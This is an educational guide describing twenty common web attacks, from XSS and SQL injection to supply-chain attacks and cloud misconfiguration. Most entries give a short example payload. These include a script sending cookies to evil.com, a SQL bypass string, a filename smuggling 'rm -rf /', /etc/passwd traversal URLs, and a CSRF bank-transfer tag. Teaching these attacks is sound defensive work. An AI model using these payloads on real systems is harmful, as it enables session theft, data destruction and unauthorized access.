Guide: The Main Web Attacks
1. XSS (Cross-Site Scripting)
Description: XSS is a vulnerability where an attacker injects malicious JavaScript code into a web page. This code runs in the browsers of other users who visit the page.
Why and for what: Allows stealing session cookies, redirecting users to phishing sites, displaying fake login forms, or logging keystrokes.
Attack example: A site allows users to leave comments without filtering tags. The attacker posts:
<script>fetch('https://evil.com/steal?cookie=' + document.cookie)</script>
When other users view the comment, their browser sends session cookies to the attacker’s server.
2. SQL Injection (SQLi)
Description: SQL Injection is when an attacker inserts malicious SQL commands into input fields that are directly used in database queries without proper sanitization.
Why and for what: Allows bypassing authentication, stealing, modifying, or deleting data from the database.
Attack example: Login query:
SELECT * FROM users WHERE username = '$input_username' AND password = '$input_password'
Attacker inputs:
' OR '1'='1
Resulting query:
SELECT * FROM users WHERE username = '' OR '1'='1'
Always true, so attacker logs in without a password.
3. Remote Code Execution (RCE)
Description: RCE is a vulnerability that allows an attacker to execute arbitrary commands on the server.
Why and for what: Full server takeover, deleting or stealing files, installing malware.
Attack example: A site runs a command after file upload:
convert $filename output.pdf
If the attacker uploads a file named:
file.png; rm -rf /
The server executes rm -rf /
deleting all files.
4. LFI / RFI (Local / Remote File Inclusion)
Description: The attacker tricks the server into loading local or remote files that should not be accessible.
Why and for what: To read sensitive system files or execute malicious remote code.
Attack example: URL:
https://site.com/page.php?file=../../../../etc/passwd
Returns system password file content instead of the page.
5. CSRF (Cross-Site Request Forgery)
Description: Forces a logged-in user’s browser to perform unwanted actions on a trusted site without their knowledge.
Why and for what: Unauthorized money transfers, password changes, data deletion.
Attack example: User is logged into their bank. Attacker sends an email with:
<img src="https://bank.com/transfer?to=attacker&amount=1000">
Opening the email triggers a money transfer request automatically.
6. Broken Access Control
Description: Failure to properly check user permissions, allowing access to unauthorized data or actions.
Why and for what: Accessing other users’ accounts, admin panels, or modifying data.
Attack example: User views profile:
https://site.com/profile?id=123
Changes id to 124 and sees someone else’s profile because access isn’t verified.
7. Directory Traversal
Description: Tricks the site into reading files outside the web root directory by using special characters.
Why and for what: Steal passwords, config files, or map server file structure.
Attack example: Request:
https://site.com/view?file=../../../etc/passwd
Returns system password file content.
8. SSRF (Server-Side Request Forgery)
Description: Forces the server to make HTTP requests to internal or external resources on behalf of the attacker.
Why and for what: Access internal services, bypass firewalls, conduct further attacks.
Attack example: Parameter:
https://site.com/fetch?url=http://localhost/admin
Server fetches internal admin page not accessible externally.
9. Clickjacking
Description: Tricks a user into clicking hidden or disguised elements.
Why and for what: Make the user perform unintended actions like deleting accounts.
Attack example: A “Play” button is overlaid with a transparent frame containing a “Delete Account” button.
10. Insecure Deserialization
Description: Flaws in deserializing data allow execution of arbitrary code.
Why and for what: Remote code execution, privilege escalation.
Attack example: Sending a crafted serialized object that executes code when deserialized.
11. Rate Limit Bypass
Description: Lack of or bypassing restrictions on the number of requests a user or IP can make.
Why and for what: Brute force attacks, spam, denial of service.
Attack example: Automated scripts send thousands of login attempts per second.
12. Open Redirect
Description: Redirects users from a trusted website to a malicious one.
Why and for what: Phishing and abuse of trust.
Attack example: URL:
https://trusted.com/redirect?url=http://evil.com
User thinks they are on trusted.com but lands on a malicious site.
13. Subdomain Takeover
Description: Taking control of an unused or expired subdomain.
Why and for what: Hosting phishing or malware sites under trusted domain names.
Attack example: An expired subdomain old.example.com is registered by attacker and used maliciously.
14. HTTP Request Smuggling
Description: Manipulating HTTP requests to confuse proxies and servers, causing one request to be interpreted as two.
Why and for what: Bypass authentication, steal data from other users.
Attack example: Sending conflicting Content-Length headers to split requests.
15. Cache Poisoning
Description: Injecting malicious content into cached responses of proxies or browsers.
Why and for what: Serve fake pages to multiple users.
Attack example: Modifying server response to include malicious JavaScript cached by proxies.
16. Padding Oracle / Crypto Attacks
Description: Exploiting cryptographic weaknesses to decrypt or tamper with encrypted data.
Why and for what: Bypass encryption, steal data.
Attack example: Repeated queries to an oracle to decrypt ciphertext byte by byte.
17. Mass Assignment
Description: Changing hidden or unauthorized fields in API requests.
Why and for what:
Escalate privileges (e.g., set isAdmin
to true).
Attack example: Sending JSON payload:
{
"username": "user",
"isAdmin": true
}
Server accepts and grants admin rights.
18. JWT Tampering
Description: Modifying JSON Web Tokens to gain unauthorized access.
Why and for what: Impersonate users or escalate privileges.
Attack example: Changing user ID in token payload without valid signature.
19. Supply Chain Attack
Description: Injecting malicious code into third-party libraries or tools used by many projects.
Why and for what: Mass compromise, backdoors.
Attack example: A compromised npm package contains malware that infects all projects using it.
20. Public Cloud Misconfiguration
Description: Misconfigured cloud resources exposing sensitive data publicly.
Why and for what: Data leaks, compliance violations.
Attack example: An AWS S3 bucket is left public with confidential documents accessible to anyone.
Last updated
Was this helpful?